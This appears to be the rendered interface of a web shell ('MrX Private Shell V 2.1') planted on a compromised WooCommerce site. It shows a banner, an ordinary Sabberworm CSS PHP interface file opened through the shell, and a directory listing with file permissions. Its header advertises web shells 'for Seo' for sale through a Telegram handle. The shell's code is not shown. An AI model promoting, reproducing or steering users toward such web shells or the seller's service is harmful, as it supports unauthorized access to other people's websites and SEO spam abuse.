__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
declare(strict_types=1);
namespace Automattic\WooCommerce\Vendor\Sabberworm\CSS;
/**
* Represents any entity in the CSS that is encapsulated by a class.
*
* Its primary purpose is to provide a type for use with `Document::getAllValues()`
* when a subset of values from a particular part of the document is required.
*
* Thus, elements which don't contain `Value`s (such as statement at-rules) don't need to implement this.
*
* It extends `Renderable` because every element is renderable.
*/
interface CSSElement extends Renderable {}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| CSSList | Folder | 0775 |
|
|
| Comment | Folder | 0775 |
|
|
| Parsing | Folder | 0775 |
|
|
| Position | Folder | 0775 |
|
|
| Property | Folder | 0775 |
|
|
| Rule | Folder | 0775 |
|
|
| RuleSet | Folder | 0775 |
|
|
| Value | Folder | 0775 |
|
|
| CSSElement.php | File | 552 B | 0664 |
|
| OutputFormat.php | File | 11.26 KB | 0664 |
|
| OutputFormatter.php | File | 6.4 KB | 0664 |
|
| Parser.php | File | 1.91 KB | 0664 |
|
| Renderable.php | File | 453 B | 0664 |
|
| Settings.php | File | 2.61 KB | 0664 |
|